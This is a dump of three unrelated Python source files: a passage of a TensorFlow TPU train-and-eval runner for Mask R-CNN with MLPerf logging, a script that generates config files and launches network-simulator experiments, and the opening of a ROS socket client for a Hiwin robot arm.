self.eval_steps = eval_steps
self.num_shards = self.train_params["num_shards"]
self.input_flattener = runner_utils.InputsFlattener()
self.eval_input_flattener = runner_utils.InputsFlattener()
self.num_hosts = None
self.train_eval_compile_op = None
self.train_eval_op = None
self.infeed_queue = []
self.eval_infeed_queue = []
self.outfeed_names = []
self.outfeed_tensors = []
self.enqueue_ops = []
self.eval_enqueue_ops = []
self.dequeue_ops = []
self.dataset_initializer = []
self.eval_dataset_initializer = []
self.scaffold_fn = None
# Having two separate sessions and graphs to make the initialization faster.
self.input_sess = None
self.train_eval_sess = None
self.input_graph = tf.Graph()
self.train_eval_graph = tf.Graph()
self.session_config = tf.ConfigProto(
allow_soft_placement=True, isolate_session_state=True,
operation_timeout_in_ms=600 * 60 * 1000) # 10 hours
cluster_spec = self.tpu_cluster_resolver.cluster_spec()
if cluster_spec:
self.session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
self.tpu_init = tf.contrib.tpu.initialize_system()
self.tpu_shutdown = tf.contrib.tpu.shutdown_system()
self.master = self.tpu_cluster_resolver.get_master()
self.init_sess = tf.Session(self.master, config=self.session_config)
self.device_topology = self.init_sess.run(self.tpu_init)
self.input_partition_dims = input_partition_dims
self.use_spatial_partition = input_partition_dims is not None
self.num_cores_per_replica = num_cores_per_replica
if self.use_spatial_partition:
computation_shape = _NUM_CORES_TO_COMPUTATION_SHAPE[
self.num_cores_per_replica]
self.device_assignment = tpu_device_assignment.device_assignment(
topology=self.device_topology,
computation_shape=computation_shape,
num_replicas=self.num_shards)
tf.logging.info("num_cores_per_replica: %d", self.num_cores_per_replica)
tf.logging.info("computation_shape: %s", str(computation_shape))
tf.logging.info("num_replicas: %d", self.num_shards)
tf.logging.info("device_assignment.topology.device_coordinates: %s",
str(self.device_assignment.topology.device_coordinates))
tf.logging.info("device_assignment.core_assignment: %s",
str(self.device_assignment.core_assignment))
self.input_dims_flattener = runner_utils.InputDimsFlattener(
self.input_partition_dims)
eval_input_partition_dims = [dict(self.input_partition_dims[0]), None]
# don't need to partition the "is_padding" dimension
if eval_params["eval_samples"] % eval_params["eval_batch_size"] != 0:
eval_input_partition_dims[0][mask_rcnn_params.IS_PADDING] = None
self.eval_input_dims_flattener = runner_utils.InputDimsFlattener(
eval_input_partition_dims)
else:
self.device_assignment = None
self.input_dims_flattener = None
self.eval_input_dims_flattener = None
# Summary writer writes out train metrics.
self.summary_writer = tf.summary.FileWriter(self.model_dir)
# Summary writer writes out eval metrics.
eval_output_dir = os.path.join(self.model_dir, "eval")
tf.gfile.MakeDirs(eval_output_dir)
self.eval_summary_writer = tf.summary.FileWriter(eval_output_dir)
self.infeed_thread = None
self.total_epoch = self.train_params[
"total_steps"] // self.iterations_per_loop
def shutdown(self):
"""Shut down TrainLowLevelRunner."""
tf.logging.info("TrainLowLevelRunner: shutdown")
if self.infeed_thread:
self.infeed_thread.join()
if self.input_sess:
self.input_sess.close()
if self.train_eval_sess:
self.train_eval_sess.close()
self.summary_writer.close()
self.eval_summary_writer.close()
def _get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
job_name = (
self.tpu_job_name or self.tpu_cluster_resolver.get_job_name() or
"tpu_worker")
return "/job:%s/task:%d" % (job_name, host_id)
def build_enqueue_ops(self, input_fn, params, num_hosts, host_id, iterations,
is_training=True):
"""Build enqueue ops."""
tf.logging.info("TrainLowLevelRunner: build_enqueue_ops for %d, train=%g",
host_id, is_training)
def get_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function for training."""
# TODO(b/129084726): make dataset sharding also work for TPU Estimator.
params["dataset_num_shards"] = num_hosts
params["dataset_shard_id"] = host_id
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
dataset = input_fn(params)
iterator = dataset.make_initializable_iterator()
if is_training:
self.dataset_initializer.append(iterator.initializer)
else:
self.eval_dataset_initializer.append(iterator.initializer)
def enqueue_ops_fn():
"""Enqueue ops function for one host."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(self.train_params["replicas_per_worker"]):
with tf.control_dependencies(control_deps):
features, labels = iterator.get_next()
if self.use_spatial_partition:
self.input_dims_flattener.validate_and_flatten_input_dims(
features, labels)
flattened_inputs = (
self.input_flattener.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if self.use_spatial_partition:
flattened_input_dims = (
self.input_dims_flattener.flattened_input_dims)
# pylint: disable=protected-access
infeed = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
self.infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(per_host_sharded_inputs)
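        # Without spatial partitioning, fall back to a plain InfeedQueue and
        # map each replica onto a TPU core via runner_utils.tpu_ordinal_fn.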
infeed = tf.contrib.tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
self.infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=functools.partial(
runner_utils.tpu_ordinal_fn,
replicas_per_worker=self.train_params["replicas_per_worker"]))
return enqueue_ops_fn
def get_eval_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function for eval."""
# TODO(b/129084726): make dataset sharding also work for TPU Estimator.
params["dataset_num_shards"] = num_hosts
params["dataset_shard_id"] = host_id
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
dataset = input_fn(params)
iterator = dataset.make_initializable_iterator()
self.eval_dataset_initializer.append(iterator.initializer)
def eval_enqueue_ops_fn():
"""Enqueue ops function for one host."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(self.train_params["replicas_per_worker"]):
with tf.control_dependencies(control_deps):
features = iterator.get_next()
if self.use_spatial_partition:
self.eval_input_dims_flattener.validate_and_flatten_input_dims(
features, None)
flattened_inputs = (
self.eval_input_flattener.flatten_features_and_labels(
features, None))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if self.use_spatial_partition:
flattened_input_dims = (
self.eval_input_dims_flattener.flattened_input_dims)
# pylint: disable=protected-access
infeed = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=flattened_input_dims,
device_assignment=self.device_assignment)
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(per_host_sharded_inputs)
infeed = tf.contrib.tpu.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
self.eval_infeed_queue.append(infeed)
return infeed.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=functools.partial(
runner_utils.tpu_ordinal_fn,
replicas_per_worker=self.train_params["replicas_per_worker"]))
return eval_enqueue_ops_fn
with self.input_graph.as_default():
enqueue_op = runner_utils.wrap_computation_in_while_loop(
get_enqueue_ops_fn(host_id)
if is_training else get_eval_enqueue_ops_fn(host_id),
n=iterations,
host_name=self._get_host(host_id))
if is_training:
self.enqueue_ops.append(enqueue_op)
else:
self.eval_enqueue_ops.append(enqueue_op)
def initialize(self, model_fn, input_fn, eval_input_fn):
"""Build graph and do initialization for training."""
tf.logging.info("TrainAndEvalLowLevelRunner: initialize method")
self.num_hosts = (
self.num_shards * self.num_cores_per_replica //
self.train_params["cores_per_worker"])
for i in range(self.num_hosts):
self.build_enqueue_ops(input_fn, self.train_params, self.num_hosts, i,
self.iterations_per_loop, True)
self.build_enqueue_ops(eval_input_fn, self.eval_params, self.num_hosts, i,
self.eval_steps, False)
def infeed_thread_fn():
"""Build and infeed session.run calls in a background thread."""
for cur_epoch in range(self.total_epoch):
tf.logging.info("Start to infeed train batches for epoch %d", cur_epoch)
self.input_sess.run([self.enqueue_ops])
tf.logging.info("Start to infeed eval batches for epoch %d", cur_epoch)
self.input_sess.run([self.eval_enqueue_ops])
tf.logging.info("infeed thread exited.")
def tpu_train_step(loss):
"""Generate the TPU graph."""
del loss
values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
features, labels = self.input_flattener.unflatten_features_and_labels(
values)
estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,
self.train_params)
loss, train_op = estimator_spec.loss, estimator_spec.train_op
self.scaffold_fn = estimator_spec.scaffold_fn
with tf.control_dependencies([train_op]):
return tf.identity(loss)
@tpu_function.on_device_training_loop
def train_loop():
return tf.contrib.tpu.repeat(self.iterations_per_loop, tpu_train_step,
[_INITIAL_LOSS])
def tpu_eval_step():
"""Generate the TPU graph."""
values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
(features,
_) = self.eval_input_flattener.unflatten_features_and_labels(values)
estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,
self.eval_params)
for k, v in six.iteritems(estimator_spec.predictions):
self.outfeed_names.append(k)
self.outfeed_tensors.append(v)
with tf.device(runner_utils.device_for_tpu_core(self._get_host(0))):
outfeed_enqueue_ops = tf.contrib.tpu.outfeed_enqueue_tuple(
self.outfeed_tensors)
with tf.control_dependencies([outfeed_enqueue_ops]):
return tf.no_op()
@tpu_function.on_device_training_loop
def eval_loop():
return tf.contrib.tpu.repeat(self.eval_steps, tpu_eval_step, [])
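    # One epoch on the device: the control dependency below forces the whole
    # training loop to finish before the eval loop starts dequeuing.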
def train_eval_step():
with tf.control_dependencies(train_loop()):
return eval_loop()
@tpu_function.on_device_training_loop
def train_eval_loop():
return tf.contrib.tpu.repeat(
self.total_epoch if self.train_params["all_in_one_session"] else 1,
train_eval_step, [])
def create_dequeue_ops(host_id):
"""Create outfeed dequeue ops."""
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for v in self.outfeed_tensors:
dequeue_ops.append([])
tensor_dtypes.append(v.dtype)
tensor_shapes.append(v.shape)
for i in range(self.eval_params["replicas_per_worker"]):
with tf.device(runner_utils.device_for_host(self._get_host(host_id))):
if self.use_spatial_partition:
replica_id = self.device_assignment.lookup_replicas(host_id, 0)[i]
ordinal = self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
else:
ordinal = i
outfeed_tensors = tf.contrib.tpu.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
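      # Concatenate the per-replica outfeed shards along the batch dimension so
      # each dequeued output becomes a single tensor per host.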
for j in range(len(outfeed_tensors)):
dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
return dequeue_ops
with self.train_eval_graph.as_default():
(self.train_eval_compile_op,
self.train_eval_op) = tpu.split_compile_and_shard(
train_eval_loop,
inputs=[],
num_shards=self.train_params["num_shards"],
outputs_from_all_shards=False,
device_assignment=self.device_assignment
)
for i in range(self.num_hosts):
self.dequeue_ops.append({})
tf.logging.info(
"TrainAndEvalLowLevelRunner: get dequeue ops for host:%d", i)
host_dequeue_ops = create_dequeue_ops(i)
        for j, dequeue_tensor in enumerate(host_dequeue_ops):
          self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tensor
if self.scaffold_fn:
self.scaffold_fn()
global_initializer = tf.global_variables_initializer()
local_initializer = tf.local_variables_initializer()
graph_io.write_graph(
self.train_eval_graph.as_graph_def(add_shapes=True), self.model_dir,
"graph.pbtxt")
self.saver = tf.train.Saver()
# Build tpu train model session and initialize graph
self.train_eval_sess = tf.Session(
self.master,
graph=self.train_eval_graph,
config=self.session_config)
self.train_eval_sess.run(global_initializer)
self.train_eval_sess.run(local_initializer)
# Compiles the train program.
self.train_eval_sess.run([self.train_eval_compile_op])
# Complete infeed graph generation and session.run calls
self.input_sess = tf.Session(
self.master,
graph=self.input_graph,
config=self.session_config)
self.input_sess.run(self.dataset_initializer)
self.input_sess.run(self.eval_dataset_initializer)
self.infeed_thread = threading.Thread(target=infeed_thread_fn)
# Starts the clock.
mlp_log.mlperf_print(key="init_stop", value=None)
mlp_log.mlperf_print(key="run_start", value=None)
self.infeed_thread.start()
def write_summary(self, summary_writer, graph, global_step,
elapsed_time, elapsed_steps, trained_examples):
"""Write a per-epoch summary of loss, epoch time, etc."""
with graph.as_default():
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = trained_examples / elapsed_time
if summary_writer is not None:
global_step_summary = tf.Summary(value=[
tf.Summary.Value(
tag="global_step/sec", simple_value=global_step_per_sec)
])
example_summary = tf.Summary(value=[
tf.Summary.Value(
tag="examples/sec", simple_value=examples_per_sec)
])
summary_writer.add_summary(global_step_summary, global_step)
summary_writer.add_summary(example_summary, global_step)
tf.logging.info("step = %d (%.3f sec)", global_step, elapsed_time)
tf.logging.info("global_step/sec: %g", global_step_per_sec)
tf.logging.info("examples/sec: %g", examples_per_sec)
def write_eval_summary(self, summary_writer, eval_results, current_step):
"""Write out eval results for the checkpoint."""
with tf.Graph().as_default():
summaries = []
for metric in eval_results:
summaries.append(
tf.Summary.Value(
tag=metric, simple_value=eval_results[metric]))
tf_summary = tf.Summary(value=list(summaries))
summary_writer.add_summary(tf_summary, current_step)
def get_predict_results(self, cur_epoch):
"""Run the predict loop on the TPU device."""
for step in range(self.eval_steps):
tf.logging.info(
"TrainAndEvalLowLevelRunner: reading eval step %d results", step)
predictions = {name: [] for name in self.outfeed_names}
for outfeed_dict in self.train_eval_sess.run(self.dequeue_ops):
for name, tensors in six.iteritems(outfeed_dict):
predictions[name].extend(tensors)
if step == self.eval_steps - 1:
        # All predictions have been read from the device; async eval
        # post-processing starts while the next training epoch starts on the
        # device.
mlp_log.mlperf_print(
"block_stop", None, metadata={"first_epoch_num": cur_epoch,
"epoch_count": 1})
mlp_log.mlperf_print(
"eval_start", None, metadata={"epoch_num": cur_epoch})
tf.logging.info("TrainAndEvalLowLevelRunner: start eval epoch %d.",
cur_epoch)
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": cur_epoch + 1,
"epoch_count": 1})
yield predictions
def train_and_eval(self):
"""Performs distributed model eval and writes a summary to directory."""
self.run_success = False
self.continue_train = True
    # Post-process predictions on a background thread.
def post_processing_thread_fn():
"""Run post-processing on CPU for predictions."""
mlp_log.mlperf_print(
"block_start", None, metadata={"first_epoch_num": 0,
"epoch_count": 1})
for cur_epoch in range(self.total_epoch):
eval_begin = time.time()
# Enables multi-processing to accelerate post-processing.
eval_multiprocess.eval_multiprocessing(
self.eval_steps, self.get_predict_results(cur_epoch),
self.eval_metric, self.eval_params["eval_worker_count"])
pred_end = time.time()
tf.logging.info("prediction takes %d seconds.", pred_end - eval_begin)
num_eval_samples, eval_results = self.eval_metric.evaluate()
eval_end = time.time()
tf.logging.info("COCO evaluates %d samples", num_eval_samples)
if num_eval_samples != self.eval_params["eval_samples"]:
tf.logging.info("COCO fails to evaluate all %d samples, exit!" %
self.eval_params["eval_samples"])
self.run_success = False
self.continue_train = False
return
tf.logging.info("one evaluation takes %d seconds",
eval_end - eval_begin)
self.write_eval_summary(self.eval_summary_writer, eval_results,
cur_epoch * self.iterations_per_loop)
tf.logging.info("AP: %s" % eval_results["AP"])
tf.logging.info("mask_AP: %s" % eval_results["mask_AP"])
# Eval epoch is 0-indexed (for MLPerf log parsing).
mlp_log.mlperf_print(
"eval_stop", None, metadata={"epoch_num": cur_epoch})
# TODO(b/127959551): use both metrics once the bug is resolved.
mlp_log.mlperf_print(
"eval_accuracy", (float(eval_results["AP"]),
float(eval_results["mask_AP"])),
metadata={"epoch_num": cur_epoch})
if (eval_results["AP"] >= mask_rcnn_params.BOX_EVAL_TARGET and
eval_results["mask_AP"] >= mask_rcnn_params.MASK_EVAL_TARGET):
mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
self.run_success = True
self.continue_train = False
return
# Run predict post processing thread on the background.
post_processing_thread = threading.Thread(target=post_processing_thread_fn)
post_processing_thread.start()
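    # In all_in_one_session mode a single session.run drives every epoch's
    # fused train+eval loop; otherwise one epoch runs per session.run so the
    # loop below can stop early once the eval target is reached.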
if self.train_params["all_in_one_session"]:
tf.logging.info("TrainAndEvalLowLevelRunner: start train_eval sessions")
self.train_eval_sess.run(self.train_eval_op)
else:
if self.train_params["train_and_eval_save_checkpoint"]:
ckpt_saver = runner_utils.AsyncCheckpointSaver(
_MAX_NUM_CHECKPOINT_THREADS, self.saver, self.model_dir,
self.train_eval_sess)
cur_epoch = 0
while cur_epoch < self.total_epoch and self.continue_train:
tf.logging.info("TrainAndEvalLowLevelRunner: start train epoch: %d",
cur_epoch)
start = time.time()
self.train_eval_sess.run(self.train_eval_op)
end = time.time()
self.write_summary(
summary_writer=self.summary_writer,
graph=self.train_eval_graph,
global_step=cur_epoch * self.iterations_per_loop,
elapsed_time=end - start,
elapsed_steps=self.iterations_per_loop,
trained_examples=self.train_params["num_examples_per_epoch"])
if self.train_params["train_and_eval_save_checkpoint"]:
ckpt_saver.checkpoint(cur_epoch * self.iterations_per_loop)
if self.run_success or not self.continue_train:
break
cur_epoch += 1
post_processing_thread.join()
if not self.run_success:
mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
|
run_experiments.py
|
#!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
''' backup of an old config
conf_str_incast32 =
init_cwnd: 12
max_cwnd: 15
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: 1
use_random_jitter: 1
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast2 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 2
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast32 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast143 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all33 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all144 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 1
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10']
qos_ratio = ['50,50']
#runs = ['incast32', 'all_to_all33', 'incast143', 'all_to_all144'] # no need to run incast in the 144 node
#runs = ['incast32', 'all_to_all33']
runs = ['incast2']
#runs = ['all_to_all144']
#burst_size = [1]
burst_size = [1,2,4,8,16,32,64,128,256,512]
#burst_size = [1000,2000,3000,4000,5000,6000,7000,8000,9000,10000]
## create the "./config" and "./result" by yourself :(
binary = 'coresim/simulator'
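# template fields: {0}=run/scenario name, {1}=CDF trace name,
# {2}=qos ratio (',' replaced with '_'), {3}=burst size, {4}='rand' or 'norand'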
template = binary + ' 1 ./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt > ./result/result_{0}_{1}_{2}_B{3}_{4}.txt'
cdf_temp = './CDF_{}.txt'
#cdf_RPC = ['uniform_4K', 'uniform_32K']
cdf_RPC = ['write_req']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
return int(out.split()[0])
def run_exp(params, semaphore):
    semaphore.acquire()
    print template.format(*params)
    subprocess.call(template.format(*params), shell=True)
    semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
#semaphore = threading.Semaphore(multiprocessing.cpu_count() / 2) # save my poor laptop
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
num_flow = 1000000
#num_flow = 5000000 # use a larger number for all_to_all144
random_flow_start = 0 # 1: means exponential randomness in flow start time
# generate conf file
if r == 'incast32':
conf_str = conf_str_incast32.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast2':
conf_str = conf_str_incast2.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all33':
conf_str = conf_str_all_to_all33.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast143':
conf_str = conf_str_incast143.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all144':
conf_str = conf_str_all_to_all144.format(num_flow, cdf, ratio, burst, random_flow_start)
else:
assert False, r
# Note modify the config dir name
isrand = 'norand'
if (random_flow_start):
isrand = 'rand'
confFile = "./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt".format(r, cdf, ratio.replace(',', '_'), burst, isrand)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, cdf, ratio.replace(',', '_'), burst, isrand), semaphore)))
print '\n'
[t.start() for t in threads]
[t.join() for t in threads]
print 'finished', len(threads), 'experiments'
|
Hiwin_RT605_ArmCommand_Socket_20190627195102.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        return  # don't raise StopIteration here: under PEP 479 (Python 3.7+) it becomes a RuntimeError
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
        self.s.send(msg.encode('utf-8')) # encode with utf-8; other encodings exist, but utf-8 works for str
def get_recieve(self):
        data = self.s.recv(1024) # 1024 is the buffer size, i.e. how many bytes to receive at once
        # The raw bytes are returned on purpose: callers index individual bytes
        # of the feedback string (e.g. feedback_str[2]).
return data
def close(self):
self.s.close()
